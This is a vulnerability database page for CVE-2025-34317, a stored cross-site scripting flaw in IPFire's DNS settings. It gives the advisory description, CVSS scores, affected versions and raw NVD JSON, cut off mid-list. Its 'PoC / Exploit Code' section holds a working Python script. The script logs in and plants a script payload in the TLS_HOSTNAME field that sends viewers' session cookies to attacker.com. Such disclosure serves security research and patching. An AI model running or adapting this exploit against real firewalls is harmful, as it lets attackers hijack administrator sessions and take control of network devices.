Security Vulnerability Report
中文
CVE-2025-34317 CVSS 5.4 MEDIUM

CVE-2025-34317

Published: 2025-10-28 15:16:12
Last Modified: 2025-11-03 17:03:02
Source: [email protected]

Description

IPFire versions prior to 2.29 (Core Update 198) contain a stored cross-site scripting (XSS) vulnerability that allows an authenticated attacker to inject arbitrary JavaScript code through the TLS_HOSTNAME parameter when adding a new DNS entry. When a user adds a DNS entry, the application issues an HTTP POST request to /cgi-bin/dns.cgi and the TLS hostname is provided in the TLS_HOSTNAME parameter. The value of this parameter is stored and later rendered in the web interface without proper sanitation or encoding, allowing injected scripts to execute in the context of other users who view the affected DNS configuration.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ipfire:ipfire:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update183:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update184:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update185:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update186:*:*:*:*:*:* - VULNERABLE
IPFire < 2.29 (Core Update 198)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import quote # CVE-2025-34317 PoC - IPFire Stored XSS via DNS settings # Target: IPFire < 2.29 (Core Update 198) # Endpoint: /cgi-bin/dns.cgi TARGET_URL = "http://target-ipfire:444/cgi-bin/dns.cgi" USERNAME = "admin" PASSWORD = "password" # XSS payload - steals session cookies XSS_PAYLOAD = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>' def exploit_stored_xss(): """ Exploit the stored XSS vulnerability in IPFire DNS settings. 1. Authenticate to IPFire web interface 2. Submit DNS entry with XSS payload in TLS_HOSTNAME parameter 3. Payload is stored and executed when any admin views DNS config """ session = requests.Session() # Step 1: Authentication auth_data = { 'username': USERNAME, 'password': PASSWORD } resp = session.post(f"{TARGET_URL.replace('/cgi-bin/dns.cgi', '/cgi-bin/auth.cgi')}", data=auth_data) if resp.status_code != 200: print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Inject XSS payload via DNS settings dns_data = { 'ACTION': 'add', 'DNS_NAME': 'malicious-dns', 'DNS_IP': '8.8.8.8', 'TLS_HOSTNAME': XSS_PAYLOAD, 'SAVE': 'Add' } resp = session.post(TARGET_URL, data=dns_data) if resp.status_code == 200: print("[+] XSS payload injected successfully") print(f"[+] Payload stored in TLS_HOSTNAME field") print(f"[+] Any admin viewing DNS config will trigger: {XSS_PAYLOAD}") return True else: print("[-] Injection failed") return False if __name__ == "__main__": exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34317", "sourceIdentifier": "[email protected]", "published": "2025-10-28T15:16:12.037", "lastModified": "2025-11-03T17:03:01.643", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IPFire versions prior to 2.29 (Core Update 198) contain a stored cross-site scripting (XSS) vulnerability that allows an authenticated attacker to inject arbitrary JavaScript code through the TLS_HOSTNAME parameter when adding a new DNS entry. When a user adds a DNS entry, the application issues an HTTP POST request to /cgi-bin/dns.cgi and the TLS hostname is provided in the TLS_HOSTNAME parameter. The value of this parameter is stored and later rendered in the web interface without proper sanitation or encoding, allowing injected scripts to execute in the context of other users who view the affected DNS configuration."}, {"lang": "es", "value": "Las versiones de IPFire anteriores a la 2.29 (Core Update 198) contienen una vulnerabilidad de cross-site scripting (XSS) almacenado que permite a un atacante autenticado inyectar código JavaScript arbitrario a través del parámetro TLS_HOSTNAME al añadir una nueva entrada DNS. Cuando un usuario añade una entrada DNS, la aplicación emite una solicitud HTTP POST a /cgi-bin/dns.cgi y el nombre de host TLS se proporciona en el parámetro TLS_HOSTNAME. El valor de este parámetro se almacena y posteriormente se renderiza en la interfaz web sin la sanitización o codificación adecuadas, permitiendo que los scripts inyectados se ejecuten en el contexto de otros usuarios que visualizan la configuración DNS afectada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.29", "matchCriteriaId": "152B0C0E-533C-46A3-8688-A7A2282353E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update183:*:*:*:*:*:*", "matchCriteriaId": "A39350F9-D6D9-49A5-88BC-C5489AA6038C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update184:*:*:*:*:*:*", "matchCriteriaId": "CDDC0CEB-073B-41A0-8A52-4DAAAD77AA6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update185:*:*:*:*:*:*", "matchCriteriaId": "745640B9-2180-48C3-82CC-D6E73AAF95D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update186:*:*:*:*:*:*", "matchCriteriaId": "08006D41-7288-4333-83FE-B6FD7CD5C779"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update187:*:*:*:*:*:*", "matchCriteriaId": "15EE4FEE-62AB-4172-B898-19DE6F50B7AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update188:*:*:*:*:*:*", "matchCriteriaId": "5B0ECE9B-DD45-40E1-842A-0B0B1786187E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ip ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.